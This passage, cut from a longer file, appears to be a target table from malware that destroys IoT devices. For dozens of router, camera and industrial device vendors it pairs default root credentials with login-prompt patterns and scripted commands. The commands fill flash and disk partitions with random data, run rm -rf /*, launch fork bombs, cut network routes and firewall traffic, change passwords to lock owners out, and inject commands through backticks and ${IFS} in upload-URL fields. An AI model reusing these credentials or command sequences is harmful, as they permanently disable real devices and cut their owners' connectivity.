'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '[#$] ' ,
"halt -n -f" , '[#$] ' ,
"reboot" , '[#$] ' ,
] ,
[ 'netbox' , '.*' , "ERROR: no such command \'w\'" ,
'shell' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
'route del default' , '%WAIT%' ,
] ,
[ 'falcon' , '.*' , '(Unknown Command: \'|RMT:\d+.*@telnet:)' ,
'offline' , '[>#] ' ,
'offline' , '[>#] ' ,
'passwd' , 'password' ,
'%OLDPASS%' , 'password' ,
'%NEWPASS%' , 'password' ,
'%NEWPASS%' , '[>#] ' ,
'reset board' , '[>#] ' ,
'DSC sleep 99999999' , '[>#] ' ,
'ip sat0 add 1.2.3.4 255.255.255.0 1.2.3.5 sat0' , '[>#] ' ,
'params GLOBAL set max_mssg_bufs 1' , '[>#] ' ,
'params GLOBAL set initial_mssg_bufs 1' , '[>#] ' ,
'params SECURITY set falcon_console_from_localhost_only 1' , '[>#] ' ,
'params LL set ll_tx_window 1' , '[>#] ' ,
'params LL set ll_rx_window 1' , '[>#] ' ,
'params SPOOF set spoof_oos_buffer_size 1' , '[>#] ' ,
'params PAD set pad_tdma_payload 1' , '[>#] ' ,
'reset application' , '%WAIT%' ,
'ENTER_ERROR_STATE' , '[>#] ' ,
'TERMINATE' , '[>#] ' ,
] ,
[ "chin" , 'root/1001chin' , '' ,
'dd if=/dev/urandom of=/dev/sda1 &' , '' ,
'dd if=/dev/urandom of=/dev/sda2 &' , '' ,
'dd if=/dev/urandom of=/dev/sda3 &' , '' ,
'dd if=/dev/urandom of=/dev/sda4 &' , '' ,
'dd if=/dev/urandom of=/dev/sda &' , '' ,
'dd if=/dev/urandom of=/dev/root &' , '' ,
'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '[#$>] ' ,
'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT% ' ,
'd(){ d|d & };d 2>/dev/null' , '[#$>] ' ,
'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT% ' ,
'halt -n -f' , '[#$>] ' ,
'reboot' , '[#$>] ' ,
'd(){ d|d & };d' , '%TERM%' ,
] ,
[ "faraday" , "root/GM8182" , "" ,
"cat /dev/urandom >/dev/sda &\ncat /dev/urandom >/dev/mtdblock4 &\ncat /dev/urandom >/dev/mtdblock5 &\ncat /dev/urandom >/dev/mtdblock6 &\ncat /dev/urandom >/dev/mtdblock7 &\ncat /dev/urandom >/dev/mtdblock8 &\ncat /dev/urandom >/dev/root &\nroute del default" , '' ,
"fdisk -C 1 /dev/sda" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 /dev/mtdblock4" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 /dev/mtdblock5" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 /dev/mtdblock6" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 /dev/mtdblock7" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 /dev/mtdblock8" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk -C 1 /dev/root" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"route del default" , '%WAIT%' ,
"sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' ,
"sysctl -w kernel.threads-max=1" , '%WAIT% ' ,
"halt -n -f" , '[#$] ' ,
"reboot" , '[#$] ' ,
] ,
[ "ht-tm" , "root/20080826" , "" ,
'busybox cat /dev/urandom >/dev/mtd0 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd1 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd2 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd3 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd4 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd5 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock4 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock5 &' , '' ,
'route del default;rm -rf /* &' , '%TERM%' ,
] ,
[ "ht-tm" , ".*" , "root.*cIUPc1dKQYHkkKkiVpM" ,
'%RELAUNCH%' , '%RELAUNCH%' ,
] ,
[ "xiongmai" , "root/xc3511" , '' ,
"busybox cat /dev/urandom >/dev/mtd0 &\nbusybox cat /dev/urandom >/dev/mtd1 &\nbusybox cat /dev/urandom >/dev/mtd2 &\nbusybox cat /dev/urandom >/dev/mtd3 &\nbusybox cat /dev/urandom >/dev/mtd4 &\nbusybox cat /dev/urandom >/dev/mtd5 &\nbusybox cat /dev/urandom >/dev/mtdblock0 &\nbusybox cat /dev/urandom >/dev/mtdblock1 &\nbusybox cat /dev/urandom >/dev/mtdblock2 &\nbusybox cat /dev/urandom >/dev/mtdblock3 &\nbusybox cat /dev/urandom >/dev/mtdblock4 &\nbusybox cat /dev/urandom >/dev/mtdblock5 &\nroute del default;rm -rf /* 2>/dev/null &" , '' ,
'busybox cat /dev/urandom >/dev/mtd0 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd1 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd2 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd3 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd4 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd5 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock4 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock5 &' , '' ,
'route del default;rm -rf /* 2>/dev/null &' , "%WAIT%" ,
"poweroff -n -f" , '%TERM%' ,
] ,
[ "xiongmai" , "root/xmhdipc" , '' ,
"busybox cat /dev/urandom >/dev/mtd0 &\nbusybox cat /dev/urandom >/dev/mtd1 &\nbusybox cat /dev/urandom >/dev/mtd2 &\nbusybox cat /dev/urandom >/dev/mtd3 &\nbusybox cat /dev/urandom >/dev/mtd4 &\nbusybox cat /dev/urandom >/dev/mtd5 &\nbusybox cat /dev/urandom >/dev/mtdblock0 &\nbusybox cat /dev/urandom >/dev/mtdblock1 &\nbusybox cat /dev/urandom >/dev/mtdblock2 &\nbusybox cat /dev/urandom >/dev/mtdblock3 &\nbusybox cat /dev/urandom >/dev/mtdblock4 &\nbusybox cat /dev/urandom >/dev/mtdblock5 &\nroute del default;rm -rf /* 2>/dev/null &" , '' ,
'busybox cat /dev/urandom >/dev/mtd0 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd1 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd2 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd3 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd4 &' , '' ,
'busybox cat /dev/urandom >/dev/mtd5 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock1 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock2 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock3 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock4 &' , '' ,
'busybox cat /dev/urandom >/dev/mtdblock5 &' , '' ,
'route del default;rm -rf /* 2>/dev/null &' , "%WAIT%" ,
"poweroff -n -f" , '%TERM%' ,
] ,
[ "zte" , "root/Zte521" , '' ,
'flash_eraseall /dev/mtd0 >/dev/null &' , '' ,
'flash_eraseall /dev/mtd1 >/dev/null &' , '' ,
'flash_eraseall /dev/mtd2 >/dev/null &' , '' ,
'cat /dev/urandom >/dev/mtd0 &' , '' ,
'cat /dev/urandom >/dev/mtd1 &' , '' ,
'cat /dev/urandom >/dev/mtd2 &' , '' ,
'cat /dev/urandom >/dev/mtd3 &' , '' ,
'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
'cat /dev/urandom >/dev/mtdblock6 &' , '' ,
'cat /dev/urandom >/dev/mtdblock7 &' , '' ,
'iptables -F;iptables -t nat -F' , '' ,
'ip route del default' , '' ,
'ip route' , '[#$] ' ,
'ip link set ppp0 down' , '' ,
'ip link set br0 down' , '' ,
'ip link set eth0 down' , '' ,
'iptables -A fwinput -J DROP;iptables -A OUTPUT -j DROP;rm -rf /* &' , '%WAIT%' ,
] ,
[ "zyxel" , ".*" , 'Linux\sZyXEL\s2.*mips.*BusyBox' ,
"iptables -F" , '' ,
"iptables -t nat -F" , '' ,
"route del default" , '' ,
'sysctl -w kernel.threads-max=1' , '' ,
"iptables -A OUTPUT -j DROP" , '%WAIT%' ,
] ,
[ "hisilicon" , "root/jvbzd" , 'w:\snot\sfound' ,
"fdisk /dev/mtd1" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk /dev/sda" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"iproute del default" , '[#$] ' ,
"sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' ,
"sysctl -w kernel.threads-max=1" , '%WAIT% ' ,
"halt -n -f" , '[#$] ' ,
"reboot" , '[#$] ' ,
] ,
[ "juantech" , "root/juantech" , 'w:\snot\sfound' ,
'cat /dev/urandom >/dev/sda &' , '' ,
'cat /dev/urandom >/dev/sda1 &' , '' ,
'cat /dev/urandom >/dev/sda2 &' , '' ,
'cat /dev/urandom >/dev/mtd0 &' , '' ,
'cat /dev/urandom >/dev/mtd1 &' , '' ,
'cat /dev/urandom >/dev/mtd2 &' , '' ,
'cat /dev/urandom >/dev/mtd3 &' , '' ,
'cat /dev/urandom >/dev/mtd4 &' , '' ,
'cat /dev/urandom >/dev/mtd5 &' , '' ,
'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
"route del default" , '[#$] ' ,
"fdisk /dev/sda2" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk /dev/sda1" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"fdisk /dev/sda" , 'm\sfor\shelp\S?: ' ,
"w" , '[#$] ' ,
"sysctl -w net.ipv4.tcp_timestamps=0" , '[#$] ' ,
"sysctl -w kernel.threads-max=1" , '%WAIT% ' ,
"halt -n -f" , '[#$] ' ,
"reboot" , '[#$] ' ,
] ,
[ 'celltrash' , '.*' , '5 : Load Default and Reboot Router' ,
'2' , '#' ,
'3' , 'mode:' ,
'4' , 'no\S:' ,
'2' , '#' ,
'0' , '#' ,
'4' , '#' ,
] ,
[ "dlink" , ".*" , 'upgrade.*dlink\.ru.*firm.*' ,
"set lan ip 10.1.2.3 255.255.255.0\nsave" , '' ,
"set upnp off\nsave" , '' ,
"set dhcp off\nsave" , '' ,
"set dmz off\nsave" , '' ,
"set wifi off\nsave" , '' ,
"sh" , '[#$] ' ,
'cat /dev/urandom >/dev/sda &' , '' ,
'cat /dev/urandom >/dev/sda1 &' , '' ,
'cat /dev/urandom >/dev/sda2 &' , '' ,
'cat /dev/urandom >/dev/mtd0 &' , '' ,
'cat /dev/urandom >/dev/mtd1 &' , '' ,
'cat /dev/urandom >/dev/mtd2 &' , '' ,
'cat /dev/urandom >/dev/mtd3 &' , '' ,
'cat /dev/urandom >/dev/mtd4 &' , '' ,
'cat /dev/urandom >/dev/mtd5 &' , '' ,
'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
"iptables -F" , '' ,
"iptables -t nat -F" , '' ,
'route del default;rm -rf /* 2>/dev/null &' , '[#$] ' ,
"iptables -A OUTPUT -j DROP" , '%TERM%' ,
] ,
[ "dlink" , ".*" , 'You have a full access' ,
"set lan ip 10.1.2.3 255.255.255.0\nsave" , '' ,
"set upnp off\nsave" , '' ,
"set dhcp off\nsave" , '' ,
"set dmz off\nsave" , '' ,
"set wifi off\nsave" , '' ,
"sh" , '[#$] ' ,
'cat /dev/urandom >/dev/sda &' , '' ,
'cat /dev/urandom >/dev/sda1 &' , '' ,
'cat /dev/urandom >/dev/sda2 &' , '' ,
'cat /dev/urandom >/dev/mtd0 &' , '' ,
'cat /dev/urandom >/dev/mtd1 &' , '' ,
'cat /dev/urandom >/dev/mtd2 &' , '' ,
'cat /dev/urandom >/dev/mtd3 &' , '' ,
'cat /dev/urandom >/dev/mtd4 &' , '' ,
'cat /dev/urandom >/dev/mtd5 &' , '' ,
'cat /dev/urandom >/dev/mtdblock0 &' , '' ,
'cat /dev/urandom >/dev/mtdblock1 &' , '' ,
'cat /dev/urandom >/dev/mtdblock2 &' , '' ,
'cat /dev/urandom >/dev/mtdblock3 &' , '' ,
'cat /dev/urandom >/dev/mtdblock4 &' , '' ,
'cat /dev/urandom >/dev/mtdblock5 &' , '' ,
"iptables -F" , '' ,
"iptables -t nat -F" , '' ,
'route del default;rm -rf /* 2>/dev/null &' , '[#$] ' ,
"iptables -A OUTPUT -j DROP" , '%TERM%' ,
] ,
[ "mdm" , ".*" , 'mdm\d\d+\S*\$' ,
"passwd" , "Old password:" ,
'%OLDPASS%' , 'Enter new password: ' ,
'%NEWPASS%' , 'Re-enter new password: ' ,
'%NEWPASS%' , '[#$] ' ,
'su root' , 'Password: ' ,
'oelinux123' , '[#$] ' ,
'passwd' , 'New password: ' ,
'%NEWPASS%' , 'Retype password: ' ,
'%NEWPASS%' , '[#$] ' ,
'ps aux | grep -v "ps aux" | grep -v "grep" | grep -v "random" | grep -v "awk" | grep -v "xargs" | /bin/awk \'{print $1}\' | xargs kill -9' , '%TERM%' ,
] ,
[ "mdm" , ".*" , 'mdm\d\d+' ,
'passwd' , 'New password: ' ,
'%NEWPASS%' , 'Retype password: ' ,
'%NEWPASS%' , '[#$] ' ,
'reboot' , '%WAIT%' ,
'ps aux | grep -v "ps aux" | grep -v "grep" | grep -v "random" | grep -v "awk" | grep -v "xargs" | /bin/awk \'{print $1}\' | xargs kill -9' , '%TERM%' ,
] ,
[ "eltex" , ".*" , 'M5J9DWFfcVbL.*AuwJc4KI.*bin/ash' ,
"telnet localhost" , 'login: ' ,
"root" , 'Password: ' ,
'adminpassword' , 'root\S+# ' ,
'passwd %OLDUSER%' , 'New password:' ,
'%NEWPASS%' , 'Retype password:' ,
'%NEWPASS%' , 'root\S+# ' ,
'passwd' , 'New password:' ,
'%NEWPASS%' , 'Retype password:' ,
'%NEWPASS%' , 'root\S+# ' ,
'save' , 'root\S+# ' ,
'reboot' , 'root\S+# ' ,
] ,
[ 'qcpe' , 'admin/.*' , 'CPE> .*please enter \? for help\.' ,
'enable' , '[#>] ' ,
'router' , '[#>] ' ,
'wan name x y' , '[#>] ' ,
'wan commit' , '[#>] ' ,
"wan ip isp , user 1.2.3.4 255.255.255.0 1.2.3.5\nwan commit" , '[#>] ' ,
"lan ip 2.3.4.5 255.255.255.254\nlan commit" , '[#>] ' ,
'wlan disable' , '[#>] ' ,
'..' , '[#>] ' ,
'wimax' , '[#>] ' ,
'wmx auth username a b' , '[#>] ' ,
'wmx autoconnect disable' , '[#>] ' ,
'wmx commit' , '[#>] ' ,
"wmx disconnect\nwmx commit" , '[#>] ' ,
'..' , '[#>] ' ,
'router' , '[#>] ' ,
"filter add 0.0.0.0/0 1:65535 0.0.0.0/0 1:65535 tcp\nfilter commit" , '[#>] ' ,
] ,
[ 'vigor' , '.*' , 'Watch Dog Closed' ,
'enable' , '[>#] ' ,
'configure system' , '[>#] ' ,
'config local backup ;sh' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock7 &' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock0 &' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock1 &' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock2 &' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock3 &' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock4 &' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock5 &' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock6 &' , '[>#] ' ,
'route del default' , '%WAIT%' ,
'reboot' , '[>#] ' ,
] ,
[ 'phyhome' , '.*' , 'Index.*User.*Priority.*Location' ,
'configure' , '[>#] ' ,
'set hostname HACKED' , '[>#] ' ,
'erase startup-config' , '\]' ,
'y' , '[>#] ' ,
'reboot' , '\]' ,
'y' , '[>#] ' ,
] ,
[ 'edatahome' , '.*' , '% Unknown command:w\.' ,
'enable' , '[>#] ' ,
'erase startup-config' , '[>#] ' ,
'urlexport 1.2.3.4 test test `cat${IFS}/dev/urandom${IFS}>/dev/root` white' , '%WAIT%' ,
'date 2030 12 31 23 59 59' , '%WAIT%' ,
'exit' , '' ,
] ,
[ 'oapsmc' , '.*' , 'Unrecognized command or Incomplete command\.' ,
'reset configuration' , '[>#] ' ,
'reset configuration' , '[>#] ' ,
'reset configuration' , '[>#] ' ,
] ,
[ 'egcpa' , '.*' , 'Unknown command \'uname\'' ,
'logfile-upload' , 'URL: ' ,
'ftp://127.0.0.1/&&`dd${IFS}if=/dev/zero${IFS}of=/dev/mtdblock5${IFS}&`' , '[>#] ' ,
'logfile-upload' , 'URL: ' ,
'ftp://127.0.0.1/&&`dd${IFS}if=/dev/zero${IFS}of=/dev/root`' , '[>#] ' ,
'uci commit' , '[>#] ' ,
] ,
[ 'bintec' , '.*' , 'wizInternetGtw' ,
'ifconfig' , '[>#] ' ,
'ifconfig 1000000 down' , '[>#] ' ,
'ifconfig 1010000 down' , '[>#] ' ,
'ifconfig 1020000 down' , '[>#] ' ,
'ifconfig 1030000 down' , '[>#] ' ,
'ifconfig 1040000 down' , '[>#] ' ,
'ifconfig 50000 down' , '[>#] ' ,
'ifconfig 50001 down' , '[>#] ' ,
'ifconfig 100001 down' , '[>#] ' ,
'ifconfig 10001 down' , '[>#] ' ,
'ifconfig 1001 down' , '[>#] ' ,
'ifconfig 1000 down' , '[>#] ' ,
'halt' , '[>#] ' ,
] ,
[ 'texasi' , 'root/.*' , '% Invalid input at caret\.' ,
"exit" , '[>#] ' ,
'enable' , ': ' ,
'%OLDPASS%' , '[>#] ' ,
'shell' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock/0 &' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock/1 &' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock/2 &' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock/3 &' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock/4 &' , '[>#] ' ,
'cat /dev/urandom >/dev/mtdblock/5 &' , '[>#] ' ,
'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT% ' ,
'd() { d|d & }; d 2>/dev/null' , '[>#] ' ,
'route del default' , '[>#] ' ,
] ,
[ 'kaco' , '.*' , 'Mode: (APPLICATION|BOOTROM)' ,
'ipconfig -s 1.2.3.4 255.255.255.0 1.2.3.5' , '[>#] ' ,
'format' , '[>#] ' ,
'reset' , '[>#] ' ,
] ,
[ 'atdev' , '.*' , 'TELNET session now in ESTABLISHED state' ,
'clear flash' , '[>#] ' ,
'clear NVS' , '[>#] ' ,
'delete file=config.ins' , '[>#] ' ,
'delete file=config.gui' , '[>#] ' ,
'set user=%OLDUSER% login=no telnet=no' , '[>#] ' ,
'set ip nameserver=127.0.0.1' , '[>#] ' ,
'set ip secondarynameserver=127.0.0.1' , '[>#] ' ,
'set ip interface=ppp0 ipaddress=127.0.0.1' , '[>#] ' ,
'set ip interface=eth1 ipaddress=127.0.0.1' , '[>#] ' ,
'set ip interface=eth0 ipaddress=127.0.0.1' , '[>#] ' ,
'set ip interface=vlan1 ipaddress=127.0.0.1' , '[>#] ' ,
'set ip interface=port1 ipaddress=127.0.0.1' , '[>#] ' ,
'set ip interface=port2 ipaddress=127.0.0.1' , '[>#] ' ,
'set ip interface=port3 ipaddress=127.0.0.1' , '[>#] ' ,
'set ip interface=port4 ipaddress=127.0.0.1' , '[>#] ' ,
'set ip interface=port5 ipaddress=127.0.0.1' , '[>#] ' ,
] ,
[ 'adb' , '.*' , '\*\s+ADB BROADBAND\s+\*' ,
'restore default-setting' , '[>#] ' ,
'reboot' , '[>#] ' ,
] ,
[ 'weathergoose' , '.*' , 'ITW WeatherGoose' ,
'reset factory' , '[>#] ' ,
'reset network' , '[>#] ' ,
] ,
[ 'hpnp' , '.*' , 'clear configure create delete disable' ,
'unconfigure switch' , 'yes or no' ,
'yes' , 'configuration' ,
] ,
[ 'kopp' , '.*' , 'root\@kopp' ,
'cat /dev/urandom >/dev/mmcblk1p1 &' , '[>#] ' ,
'cat /dev/urandom >/dev/root &' , '[>#] ' ,
'route del default' , '[>#] ' ,
'rm -rf /* & 2>/dev/null' , '[>#] ' ,
] ,
[ 'elsist' , '.*' , 'Elsist.*maintenance shell' ,
'format Storage, 1' , 'Y,n' ,
'Y' , '[>#] ' ,
'format System, 1' , 'Y,n' ,
'Y' , '[>#] ' ,
'userconfig -p %OLDUSER% %NEWPASS%' , '[>#] ' ,
'cfgcommit' , '[>#] ' ,
'ifconfig -a eth0 1.2.3.4' , '[>#] ' ,
'ifconfig -g eth0 1.2.3.5' , '[>#] ' ,
'ifconfig -a eth1 1.2.3.6' , '[>#] ' ,
'ifconfig -g eth1 1.2.3.7' , '[>#] ' ,
'cfgcommit' , '[>#] ' ,
'sysconfig -wid' , '[>#] ' ,
'sysconfig -mtcpd' , '[>#] ' ,
'sysconfig -usbd' , '[>#] ' ,
'cfgcommit' , '[>#] ' ,
'reboot' , 'Y,n' ,
'Y' , 'rebooting' ,
] ,
[ 'swim' , '.*' , 'task wait: task \S+ not found\.' ,
'rm -r /tffs/*' , '[>#] ' ,